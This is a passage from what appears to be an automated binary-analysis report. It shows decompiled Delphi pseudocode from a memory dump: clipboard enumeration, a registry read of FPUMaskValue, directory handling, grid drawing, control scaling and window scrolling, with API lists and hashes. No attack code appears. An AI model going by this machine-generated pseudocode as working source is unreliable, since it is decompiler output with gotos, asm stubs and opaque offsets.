                                                                        					E004223E0(_t43, _t20, _t26, _t53, GetClipboardData(9));
                                                                        					_t24 = E00403E54();
                                                                        					return _t24;
                                                                        				}
                                                                        				L6:
                                                                        			}

                                                                        APIs
                                                                        • EnumClipboardFormats.USER32(00000000,00000000,0042FC8A), ref: 0042FC0C
                                                                        • GetClipboardData.USER32 ref: 0042FC2C
                                                                        • GetClipboardData.USER32 ref: 0042FC35
                                                                        • EnumClipboardFormats.USER32(00000000,00000000,00000000,0042FC8A), ref: 0042FC51
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Similarity
                                                                        • API ID: Clipboard$DataEnumFormats
                                                                        • String ID: x@
                                                                        • API String ID: 1256399260-1446391196
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 65%
                                                                        			E00403454() {
                                                                        				void* _v8;
                                                                        				char _v12;
                                                                        				int _v16;
                                                                        				signed short _t12;
                                                                        				signed short _t14;
                                                                        				intOrPtr _t27;
                                                                        				void* _t29;
                                                                        				void* _t31;
                                                                        				intOrPtr _t32;
                                                                        
                                                                        				_t29 = _t31;
                                                                        				_t32 = _t31 + 0xfffffff4;
                                                                        				_v12 =  *0x47a00c & 0x0000ffff;
                                                                        				if(RegOpenKeyExA(0x80000002, "SOFTWARE\\Borland\\Delphi\\RTL", 0, 1,  &_v8) != 0) {
                                                                        					_t12 =  *0x47a00c; // 0x1332
                                                                        					_t14 = _t12 & 0x0000ffc0 | _v12 & 0x0000003f;
                                                                        					 *0x47a00c = _t14;
                                                                        					return _t14;
                                                                        				} else {
                                                                        					_push(_t29);
                                                                        					_push(E004034C5);
                                                                        					_push( *[fs:eax]);
                                                                        					 *[fs:eax] = _t32;
                                                                        					_v16 = 4;
                                                                        					RegQueryValueExA(_v8, "FPUMaskValue", 0, 0,  &_v12,  &_v16);
                                                                        					_pop(_t27);
                                                                        					 *[fs:eax] = _t27;
                                                                        					_push(0x4034cc);
                                                                        					return RegCloseKey(_v8);
                                                                        				}
                                                                        			}

                                                                        APIs
                                                                        • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00403476
                                                                        • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,004034C5,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 004034A9
                                                                        • RegCloseKey.ADVAPI32(?,004034CC,00000000,?,00000004,00000000,004034C5,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 004034BF
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Similarity
                                                                        • API ID: CloseOpenQueryValue
                                                                        • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                                        • API String ID: 3677997916-4173385793
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00402924(void* __eax, void* __edx) {
                                                                        				char _v271;
                                                                        				char _v532;
                                                                        				char _v534;
                                                                        				char _v535;
                                                                        				void* _t21;
                                                                        				void* _t25;
                                                                        				CHAR* _t26;
                                                                        
                                                                        				_t25 = __edx;
                                                                        				_t21 = __eax;
                                                                        				if(__eax != 0) {
                                                                        					 *_t26 = 0x40;
                                                                        					_v535 = 0x3a;
                                                                        					_v534 = 0;
                                                                        					GetCurrentDirectoryA(0x105,  &_v271);
                                                                        					SetCurrentDirectoryA(_t26);
                                                                        				}
                                                                        				GetCurrentDirectoryA(0x105,  &_v532);
                                                                        				if(_t21 != 0) {
                                                                        					SetCurrentDirectoryA( &_v271);
                                                                        				}
                                                                        				return E004045B0(_t25, 0x105,  &_v532);
                                                                        			}

                                                                        APIs
                                                                        • GetCurrentDirectoryA.KERNEL32(00000105,?,?,?,0046650B), ref: 00402956
                                                                        • SetCurrentDirectoryA.KERNEL32(?,00000105,?,?,?,0046650B), ref: 0040295C
                                                                        • GetCurrentDirectoryA.KERNEL32(00000105,?,?,?,0046650B), ref: 0040296B
                                                                        • SetCurrentDirectoryA.KERNEL32(?,00000105,?,?,?,0046650B), ref: 0040297C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Similarity
                                                                        • API ID: CurrentDirectory
                                                                        • String ID: :
                                                                        • API String ID: 1611563598-336475711
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 93%
                                                                        			E0045CDD8(signed int __eax, long __ecx, char __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
                                                                        				signed int _v8;
                                                                        				long _v12;
                                                                        				char _v16;
                                                                        				signed int _v17;
                                                                        				struct tagRECT _v33;
                                                                        				struct tagRECT _v49;
                                                                        				struct tagRECT _v65;
                                                                        				void* __edi;
                                                                        				void* __ebp;
                                                                        				intOrPtr _t138;
                                                                        				intOrPtr _t148;
                                                                        				signed int _t163;
                                                                        				signed int _t166;
                                                                        				intOrPtr _t167;
                                                                        				intOrPtr _t180;
                                                                        				intOrPtr _t181;
                                                                        				intOrPtr _t182;
                                                                        				intOrPtr _t183;
                                                                        				signed int _t188;
                                                                        				intOrPtr _t201;
                                                                        				intOrPtr _t202;
                                                                        				intOrPtr _t205;
                                                                        				intOrPtr _t206;
                                                                        				intOrPtr _t232;
                                                                        				intOrPtr _t233;
                                                                        				intOrPtr _t234;
                                                                        				intOrPtr _t235;
                                                                        				intOrPtr _t236;
                                                                        				intOrPtr _t238;
                                                                        				intOrPtr* _t240;
                                                                        				signed int _t252;
                                                                        				intOrPtr _t253;
                                                                        				intOrPtr _t256;
                                                                        				signed int _t257;
                                                                        				void* _t265;
                                                                        
                                                                        				_v12 = __ecx;
                                                                        				_v8 = __eax;
                                                                        				_t240 = _a24 + 0xfffffffc;
                                                                        				_v16 = __edx;
                                                                        				_v49.top = _a20;
                                                                        				while(1) {
                                                                        					_t138 = _v49.top;
                                                                        					if(_t138 >= _a12) {
                                                                        						break;
                                                                        					}
                                                                        					_t138 =  *((intOrPtr*)( *_t240 + 0x24c));
                                                                        					if(_t138 > _v16) {
                                                                        						_t257 = _v8;
                                                                        						_v49.left = _v12;
                                                                        						_v49.bottom = E004607E0( *_t240, _v16) + _v49.top;
                                                                        						while(1) {
                                                                        							__eflags = _v49.left - _a16;
                                                                        							if(_v49.left >= _a16) {
                                                                        								break;
                                                                        							}
                                                                        							_t148 =  *_t240;
                                                                        							__eflags = _t257 -  *((intOrPtr*)(_t148 + 0x21c));
                                                                        							if(_t257 <  *((intOrPtr*)(_t148 + 0x21c))) {
                                                                        								_v49.right = E004607C0( *_t240, _t257) + _v49.left;
                                                                        								__eflags = _v49.right - _v49.left;
                                                                        								if(_v49.right <= _v49.left) {
                                                                        									L39:
                                                                        									_v49.left =  *((intOrPtr*)(_a24 - 0x70)) + _v49.right;
                                                                        									_t257 = _t257 + 1;
                                                                        									__eflags = _t257;
                                                                        									continue;
                                                                        								}
                                                                        								__eflags = RectVisible(E00420730( *((intOrPtr*)( *_t240 + 0x208))),  &_v49);
                                                                        								if(__eflags == 0) {
                                                                        									goto L39;
                                                                        								} else {
                                                                        									_v17 = _a4;
                                                                        									_t163 = E0045C608( *_t240, __eflags);
                                                                        									__eflags = _t163;
                                                                        									if(_t163 != 0) {
                                                                        										_t236 =  *_t240;
                                                                        										__eflags =  *((intOrPtr*)(_t236 + 0x22c)) - _v16;
                                                                        										if( *((intOrPtr*)(_t236 + 0x22c)) == _v16) {
                                                                        											_t238 =  *_t240;
                                                                        											__eflags = _t257 -  *((intOrPtr*)(_t238 + 0x228));
                                                                        											if(_t257 ==  *((intOrPtr*)(_t238 + 0x228))) {
                                                                        												_t24 =  &_v17;
                                                                        												 *_t24 = _v17 | 0x00000002;
                                                                        												__eflags =  *_t24;
                                                                        											}
                                                                        										}
                                                                        									}
                                                                        									_t242 = _a24 - 0x80;
                                                                        									_t166 = E0045B33C(_t257, _a24 - 0x80, _v16);
                                                                        									__eflags = _t166;
                                                                        									if(_t166 != 0) {
                                                                        										_t29 =  &_v17;
                                                                        										 *_t29 = _v17 | 0x00000001;
                                                                        										__eflags =  *_t29;
                                                                        									}
                                                                        									__eflags = _v17 & 0x00000002;
                                                                        									if((_v17 & 0x00000002) == 0) {
                                                                        										L14:
                                                                        										_t167 =  *_t240;
                                                                        										__eflags =  *((char*)(_t167 + 0x28c));
                                                                        										if( *((char*)(_t167 + 0x28c)) != 0) {
                                                                        											L16:
                                                                        											_t260 =  *((intOrPtr*)( *_t240 + 0x208));
                                                                        											E0042062C( *((intOrPtr*)( *_t240 + 0x208)));
                                                                        											__eflags = _v17 & 0x00000001;
                                                                        											if(__eflags == 0) {
                                                                        												L20:
                                                                        												E0041FC50( *((intOrPtr*)(_t260 + 0x14)), _t242, _a8, _t257, _t265, __eflags);
                                                                        												L21:
                                                                        												E004202E8(_t260,  &_v49);
                                                                        												L22:
                                                                        												 *((intOrPtr*)( *((intOrPtr*)( *_t240)) + 0xd4))(_v17,  &_v49);
                                                                        												_t180 =  *_t240;
                                                                        												__eflags =  *((char*)(_t180 + 0x28c));
                                                                        												if( *((char*)(_t180 + 0x28c)) != 0) {
                                                                        													__eflags = _v17 & 0x00000004;
                                                                        													if((_v17 & 0x00000004) != 0) {
                                                                        														_t201 =  *_t240;
                                                                        														__eflags =  *((char*)(_t201 + 0x1a5));
                                                                        														if( *((char*)(_t201 + 0x1a5)) != 0) {
                                                                        															_t202 = _a24;
                                                                        															_t253 = _a24;
                                                                        															__eflags =  *(_t202 - 0x84) |  *(_t253 - 0x88);
                                                                        															if(( *(_t202 - 0x84) |  *(_t253 - 0x88)) != 0) {
                                                                        																asm("movsd");
                                                                        																asm("movsd");
                                                                        																asm("movsd");
                                                                        																asm("movsd");
                                                                        																_t257 = _t257;
                                                                        																_t205 = _a24;
                                                                        																__eflags =  *(_t205 - 0x84) & 0x00000004;
                                                                        																if(( *(_t205 - 0x84) & 0x00000004) != 0) {
                                                                        																	_t206 = _a24;
                                                                        																	__eflags =  *(_t206 - 0x84) & 0x00000008;
                                                                        																	if(( *(_t206 - 0x84) & 0x00000008) == 0) {
                                                                        																		_t88 =  &(_v65.bottom);
                                                                        																		 *_t88 = _v65.bottom +  *((intOrPtr*)(_a24 - 0x40));
                                                                        																		__eflags =  *_t88;
                                                                        																	}
                                                                        																} else {
                                                                        																	_v65.right = _v65.right +  *((intOrPtr*)(_a24 - 0x70));
                                                                        																}
                                                                        																DrawEdge(E00420730( *((intOrPtr*)( *_t240 + 0x208))),  &_v65, 4,  *(_a24 - 0x84));
                                                                        																DrawEdge(E00420730( *((intOrPtr*)( *_t240 + 0x208))),  &_v65, 4,  *(_a24 - 0x88));
                                                                        															}
                                                                        														}
                                                                        													}
                                                                        												}
                                                                        												_t181 =  *_t240;
                                                                        												__eflags =  *((char*)(_t181 + 0x28c));
                                                                        												if( *((char*)(_t181 + 0x28c)) != 0) {
                                                                        													_t182 =  *_t240;
                                                                        													__eflags =  *(_t182 + 0x1c) & 0x00000010;
                                                                        													if(( *(_t182 + 0x1c) & 0x00000010) == 0) {
                                                                        														__eflags = _v17 & 0x00000002;
                                                                        														if((_v17 & 0x00000002) != 0) {
                                                                        															_t183 =  *_t240;
                                                                        															_t252 =  *0x45d10c; // 0x2400
                                                                        															__eflags = _t252 - ( *(_t183 + 0x248) &  *0x45d10c);
                                                                        															if(_t252 != ( *(_t183 + 0x248) &  *0x45d10c)) {
                                                                        																__eflags =  *( *_t240 + 0x249) & 0x00000010;
                                                                        																if(__eflags == 0) {
                                                                        																	_t188 = E004037D8( *_t240, __eflags);
                                                                        																	__eflags = _t188;
                                                                        																	if(_t188 != 0) {
                                                                        																		asm("movsd");
                                                                        																		asm("movsd");
                                                                        																		asm("movsd");
                                                                        																		asm("movsd");
                                                                        																		_t257 = _t257;
                                                                        																		_v33.left = _v49.right;
                                                                        																		_v33.right = _v49.left;
                                                                        																		DrawFocusRect(E00420730( *((intOrPtr*)( *_t240 + 0x208))),  &_v33);
                                                                        																	} else {
                                                                        																		DrawFocusRect(E00420730( *((intOrPtr*)( *_t240 + 0x208))),  &_v49);
                                                                        																	}
                                                                        																}
                                                                        															}
                                                                        														}
                                                                        													}
                                                                        												}
                                                                        												goto L39;
                                                                        											}
                                                                        											__eflags = _v17 & 0x00000002;
                                                                        											if(__eflags == 0) {
                                                                        												L19:
                                                                        												E0041FC50( *((intOrPtr*)(_t260 + 0x14)), _t242, 0x8000000d, _t257, _t265, __eflags);
                                                                        												E0041F464( *((intOrPtr*)(_t260 + 0xc)), 0x8000000e);
                                                                        												goto L21;
                                                                        											}
                                                                        											_t256 =  *0x45d108; // 0x0
                                                                        											__eflags = _t256 - ( *( *_t240 + 0x248) &  *0x45d104);
                                                                        											if(__eflags == 0) {
                                                                        												goto L20;
                                                                        											}
                                                                        											goto L19;
                                                                        										}
                                                                        										_t232 =  *_t240;
                                                                        										__eflags =  *(_t232 + 0x1c) & 0x00000010;
                                                                        										if(( *(_t232 + 0x1c) & 0x00000010) == 0) {
                                                                        											goto L22;
                                                                        										}
                                                                        										goto L16;
                                                                        									}
                                                                        									_t233 =  *_t240;
                                                                        									__eflags =  *(_t233 + 0x249) & 0x00000004;
                                                                        									if(( *(_t233 + 0x249) & 0x00000004) == 0) {
                                                                        										goto L14;
                                                                        									}
                                                                        									_t234 =  *_t240;
                                                                        									__eflags =  *((char*)(_t234 + 0x28d));
                                                                        									if( *((char*)(_t234 + 0x28d)) == 0) {
                                                                        										goto L14;
                                                                        									}
                                                                        									_t235 =  *_t240;
                                                                        									__eflags =  *(_t235 + 0x1c) & 0x00000010;
                                                                        									if(( *(_t235 + 0x1c) & 0x00000010) == 0) {
                                                                        										goto L39;
                                                                        									}
                                                                        									goto L14;
                                                                        								}
                                                                        							}
                                                                        							break;
                                                                        						}
                                                                        						_v49.top =  *((intOrPtr*)(_a24 - 0x40)) + _v49.bottom;
                                                                        						_t130 =  &_v16;
                                                                        						 *_t130 = _v16 + 1;
                                                                        						__eflags =  *_t130;
                                                                        						continue;
                                                                        					}
                                                                        					break;
                                                                        				}
                                                                        				return _t138;
                                                                        			}






































                                                                        0x0045cfe8
                                                                        0x0045d00b
                                                                        0x0045d00b
                                                                        0x0045cf90
                                                                        0x0045cf78
                                                                        0x0045cf69
                                                                        0x0045d010
                                                                        0x0045d012
                                                                        0x0045d019
                                                                        0x0045d01f
                                                                        0x0045d021
                                                                        0x0045d025
                                                                        0x0045d02b
                                                                        0x0045d02f
                                                                        0x0045d031
                                                                        0x0045d041
                                                                        0x0045d048
                                                                        0x0045d04b
                                                                        0x0045d04f
                                                                        0x0045d056
                                                                        0x0045d05e
                                                                        0x0045d063
                                                                        0x0045d065
                                                                        0x0045d087
                                                                        0x0045d088
                                                                        0x0045d089
                                                                        0x0045d08a
                                                                        0x0045d08b
                                                                        0x0045d08f
                                                                        0x0045d095
                                                                        0x0045d0aa
                                                                        0x0045d067
                                                                        0x0045d079
                                                                        0x0045d079
                                                                        0x0045d065
                                                                        0x0045d056
                                                                        0x0045d04b
                                                                        0x0045d02f
                                                                        0x0045d025
                                                                        0x00000000
                                                                        0x0045d019
                                                                        0x0045ceec
                                                                        0x0045cef0
                                                                        0x0045cf0e
                                                                        0x0045cf16
                                                                        0x0045cf23
                                                                        0x00000000
                                                                        0x0045cf23
                                                                        0x0045cf02
                                                                        0x0045cf09
                                                                        0x0045cf0c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0045cf0c
                                                                        0x0045ceca
                                                                        0x0045cecc
                                                                        0x0045ced0
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0045ced0
                                                                        0x0045ce9d
                                                                        0x0045ce9f
                                                                        0x0045cea6
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0045cea8
                                                                        0x0045ceaa
                                                                        0x0045ceb1
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0045ceb3
                                                                        0x0045ceb5
                                                                        0x0045ceb9
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0045ceb9
                                                                        0x0045ce4d
                                                                        0x00000000
                                                                        0x0045d0cc
                                                                        0x0045d0db
                                                                        0x0045d0de
                                                                        0x0045d0de
                                                                        0x0045d0de
                                                                        0x00000000
                                                                        0x0045d0de
                                                                        0x00000000
                                                                        0x0045d0f4
                                                                        0x0045d100

                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c8be4bc43f859d8c8afe2417128a037c4a7ad764e5036389b60e49141e276708
                                                                        • Instruction ID: a23f4c26fc7a9db08ee943cacd5cbd9e35e16fa5ad328059b8dc8150b4b01441
                                                                        • Opcode Fuzzy Hash: c8be4bc43f859d8c8afe2417128a037c4a7ad764e5036389b60e49141e276708
                                                                        • Instruction Fuzzy Hash: 6FB11A75A002599FDB10DF58C489BDEB7F5AF09309F1440A6EC44AB3A2C778AC4ACB59
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 89%
                                                                        			E0044F614(intOrPtr __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                        				intOrPtr _v8;
                                                                        				signed char _t92;
                                                                        				int _t98;
                                                                        				int _t100;
                                                                        				intOrPtr _t117;
                                                                        				int _t122;
                                                                        				intOrPtr _t155;
                                                                        				void* _t164;
                                                                        				signed char _t180;
                                                                        				intOrPtr _t182;
                                                                        				intOrPtr _t194;
                                                                        				int _t199;
                                                                        				intOrPtr _t203;
                                                                        				void* _t204;
                                                                        
                                                                        				_t204 = __eflags;
                                                                        				_t196 = __edi;
                                                                        				_t202 = _t203;
                                                                        				_v8 = __eax;
                                                                        				E0043961C(_v8);
                                                                        				_push(_t203);
                                                                        				_push(0x44f86a);
                                                                        				_push( *[fs:edx]);
                                                                        				 *[fs:edx] = _t203;
                                                                        				 *(_v8 + 0x268) = 0;
                                                                        				 *(_v8 + 0x26c) = 0;
                                                                        				 *(_v8 + 0x270) = 0;
                                                                        				_t164 = 0;
                                                                        				_t92 =  *0x496709; // 0x0
                                                                        				 *(_v8 + 0x234) = _t92 ^ 0x00000001;
                                                                        				E00438D8C(_v8, 0, __edx, _t204);
                                                                        				if( *(_v8 + 0x25c) == 0 ||  *(_v8 + 0x270) <= 0) {
                                                                        					L12:
                                                                        					_t98 =  *(_v8 + 0x268);
                                                                        					_t213 = _t98;
                                                                        					if(_t98 > 0) {
                                                                        						E00435FC8(_v8, _t98, _t196, _t213);
                                                                        					}
                                                                        					_t100 =  *(_v8 + 0x26c);
                                                                        					_t214 = _t100;
                                                                        					if(_t100 > 0) {
                                                                        						E0043600C(_v8, _t100, _t196, _t214);
                                                                        					}
                                                                        					_t180 =  *0x44f878; // 0x0
                                                                        					 *(_v8 + 0x98) = _t180;
                                                                        					_t215 = _t164;
                                                                        					if(_t164 == 0) {
                                                                        						E0044EB7C(_v8, 1, 1);
                                                                        						E0043C730(_v8, 1, 1, _t215);
                                                                        					}
                                                                        					E00437760(_v8, 0, 0xb03d, 0);
                                                                        					_pop(_t182);
                                                                        					 *[fs:eax] = _t182;
                                                                        					_push(0x44f871);
                                                                        					return E00439624(_v8);
                                                                        				} else {
                                                                        					if(( *(_v8 + 0x98) & 0x00000010) != 0) {
                                                                        						_t194 =  *0x496c08; // 0x217094c
                                                                        						if( *(_v8 + 0x25c) !=  *((intOrPtr*)(_t194 + 0x40))) {
                                                                        							_t155 =  *0x496c08; // 0x217094c
                                                                        							E0041F64C( *((intOrPtr*)(_v8 + 0x68)), MulDiv(E0041F644( *((intOrPtr*)(_v8 + 0x68))),  *(_t155 + 0x40),  *(_v8 + 0x25c)), __edi, _t202);
                                                                        						}
                                                                        					}
                                                                        					_t117 =  *0x496c08; // 0x217094c
                                                                        					 *(_v8 + 0x25c) =  *(_t117 + 0x40);
                                                                        					_t199 = E0044F99C(_v8);
                                                                        					_t122 =  *(_v8 + 0x270);
                                                                        					_t209 = _t199 - _t122;
                                                                        					if(_t199 != _t122) {
                                                                        						_t164 = 1;
                                                                        						E0044EB7C(_v8, _t122, _t199);
                                                                        						E0043C730(_v8,  *(_v8 + 0x270), _t199, _t209);
                                                                        						if(( *(_v8 + 0x98) & 0x00000004) != 0) {
                                                                        							 *(_v8 + 0x268) = MulDiv( *(_v8 + 0x268), _t199,  *(_v8 + 0x270));
                                                                        						}
                                                                        						if(( *(_v8 + 0x98) & 0x00000008) != 0) {
                                                                        							 *(_v8 + 0x26c) = MulDiv( *(_v8 + 0x26c), _t199,  *(_v8 + 0x270));
                                                                        						}
                                                                        						if(( *(_v8 + 0x98) & 0x00000020) != 0) {
                                                                        							 *(_v8 + 0x1fa) = MulDiv( *(_v8 + 0x1fa), _t199,  *(_v8 + 0x270));
                                                                        							 *(_v8 + 0x1fe) = MulDiv( *(_v8 + 0x1fe), _t199,  *(_v8 + 0x270));
                                                                        						}
                                                                        					}
                                                                        					goto L12;
                                                                        				}
                                                                        			}


















                                                                        APIs
                                                                        • MulDiv.KERNEL32(00000000,?,00000000), ref: 0044F6D3
                                                                        • MulDiv.KERNEL32(?,00000000,00000000), ref: 0044F74F
                                                                        • MulDiv.KERNEL32(?,00000000,00000000), ref: 0044F77E
                                                                        • MulDiv.KERNEL32(?,00000000,00000000), ref: 0044F7AD
                                                                        • MulDiv.KERNEL32(?,00000000,00000000), ref: 0044F7D0
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f83b6f54dddd89dbe0c70f2b225cc0d110cc9cf3e54e16450356abb0dd6b52aa
                                                                        • Instruction ID: b7fbed5c6db0269f7e2fea028abd8eb97cbe5c16f41f339bba14ab5bac44c86c
                                                                        • Opcode Fuzzy Hash: f83b6f54dddd89dbe0c70f2b225cc0d110cc9cf3e54e16450356abb0dd6b52aa
                                                                        • Instruction Fuzzy Hash: 2D71D574A04104EFDB00DBA9C589EADB3F5AF49304F2541F6E808EB362C739AE45DB44
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 87%
                                                                        			E0045EFF4(void* __eax, int __ecx, signed int __edx, intOrPtr _a4) {
                                                                        				signed int _v8;
                                                                        				signed int _v12;
                                                                        				struct tagRECT _v28;
                                                                        				char _v44;
                                                                        				int _t90;
                                                                        				void* _t109;
                                                                        				void* _t125;
                                                                        				void* _t131;
                                                                        				intOrPtr _t142;
                                                                        				int _t143;
                                                                        
                                                                        				_t143 = __ecx;
                                                                        				_v8 = __edx;
                                                                        				_t125 = __eax;
                                                                        				_t142 = _a4;
                                                                        				_v12 = 2;
                                                                        				if( *((char*)(__eax + 0x28c)) == 0) {
                                                                        					_v12 = _v12 | 0x00000004;
                                                                        				}
                                                                        				_t147 = _t143;
                                                                        				if(_t143 != 0) {
                                                                        					__eflags = _v8;
                                                                        					if(_v8 != 0) {
                                                                        						_t29 = _t142 + 0x34; // 0xe89c933
                                                                        						_t31 = _t142 + 0xc; // 0x895653ec
                                                                        						E00412BCC( *_t31, 0,  &_v28,  *_t29);
                                                                        						ScrollWindowEx(E0043CC2C(_t125), _v8, 0,  &_v28,  &_v28, 0, 0, _v12);
                                                                        						_t37 = _t142 + 0x3c; // 0x55894233
                                                                        						_t39 = _t142 + 4; // 0x55c35b5e
                                                                        						_t40 = _t142 + 0x34; // 0xe89c933
                                                                        						__eflags = 0;
                                                                        						E00412BCC( *_t39,  *_t40,  &_v28,  *_t37);
                                                                        						ScrollWindowEx(E0043CC2C(_t125), 0, _t143,  &_v28,  &_v28, 0, 0, _v12);
                                                                        						_t44 = _t142 + 0x3c; // 0x55894233
                                                                        						_t46 = _t142 + 0xc; // 0x895653ec
                                                                        						_t47 = _t142 + 0x34; // 0xe89c933
                                                                        						E00412BCC( *_t46,  *_t47,  &_v28,  *_t44);
                                                                        						_t90 = ScrollWindowEx(E0043CC2C(_t125), _v8, _t143,  &_v28,  &_v28, 0, 0, _v12);
                                                                        					} else {
                                                                        						_t22 = _t142 + 0x3c; // 0x55894233
                                                                        						_t24 = _t142 + 0xc; // 0x895653ec
                                                                        						_t25 = _t142 + 0x34; // 0xe89c933
                                                                        						E00412BCC( *_t24,  *_t25,  &_v28,  *_t22);
                                                                        						_t90 = ScrollWindowEx(E0043CC2C(_t125), 0, _t143,  &_v28,  &_v28, 0, 0, _v12);
                                                                        					}
                                                                        				} else {
                                                                        					if(E004037D8(_t125, _t147) != 0) {
                                                                        						_t11 = _t142 + 0x3c; // 0x55894233
                                                                        						_push( *_t11);
                                                                        						_push( &_v28);
                                                                        						_t109 = E00435FB0(_t125);
                                                                        						_t13 = _t142 + 4; // 0x55c35b5e
                                                                        						_push(_t109 -  *_t13);
                                                                        						E00435FB0(_t125);
                                                                        						__eflags = 0;
                                                                        						_pop(_t131);
                                                                        						E00412BCC(_t131, 0);
                                                                        						_v8 =  ~_v8;
                                                                        					} else {
                                                                        						_t7 = _t142 + 0x3c; // 0x55894233
                                                                        						_t9 = _t142 + 0xc; // 0x895653ec
                                                                        						E00412BCC( *_t9, 0,  &_v28,  *_t7);
                                                                        					}
                                                                        					_t90 = ScrollWindowEx(E0043CC2C(_t125), _v8, 0,  &_v28,  &_v28, 0, 0, _v12);
                                                                        				}
                                                                        				_t149 =  *(_t125 + 0x249) & 0x00000010;
                                                                        				if(( *(_t125 + 0x249) & 0x00000010) == 0) {
                                                                        					return _t90;
                                                                        				} else {
                                                                        					E00460800(_t125,  &_v44);
                                                                        					return E0045E6F0(_t125,  &_v44, _t149);
                                                                        				}
                                                                        			}


                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: ScrollWindow
                                                                        • String ID:
                                                                        • API String ID: 2126015319-0
                                                                        • Opcode ID: 012e01d2e5b07f3e9b05cfdc662a801196811393e83e2eaebac9e87f70118fcb
                                                                        • Instruction ID: 7e4e7f4e2f5f89522f6d3bfcac37a2a193213212823b79a250b46dc624b20d20
                                                                        • Opcode Fuzzy Hash: 012e01d2e5b07f3e9b05cfdc662a801196811393e83e2eaebac9e87f70118fcb
                                                                        • Instruction Fuzzy Hash: EF51E171600509BBD700EEA5CD82FEFB7ACAF08304F405526BA05E7682DB74F955CBA5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 85%
                                                                        			E004469BC(void* __eax, void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, int _a4, char _a8, struct tagRECT* _a12) {
                                                                        				intOrPtr _v8;
                                                                        				intOrPtr _v12;
                                                                        				void* _v16;
                                                                        				struct tagRECT _v32;
                                                                        				void* _t53;
                                                                        				int _t63;
                                                                        				CHAR* _t65;
                                                                        				void* _t76;
                                                                        				void* _t78;
                                                                        				int _t89;
                                                                        				CHAR* _t91;
                                                                        				int _t117;
                                                                        				intOrPtr _t127;
                                                                        				void* _t139;
                                                                        				void* _t144;
                                                                        				char _t153;
                                                                        
                                                                        				_t120 = __ecx;
                                                                        				_t143 = _t144;
                                                                        				_v16 = 0;
                                                                        				_v12 = __ecx;
                                                                        				_v8 = __edx;
                                                                        				_t139 = __eax;
                                                                        				_t117 = _a4;
                                                                        				_push(_t144);
                                                                        				_push(0x446ba0);
                                                                        				_push( *[fs:eax]);
                                                                        				 *[fs:eax] = _t144 + 0xffffffe4;
                                                                        				_t53 = E00448820(__eax);
                                                                        				_t135 = _t53;
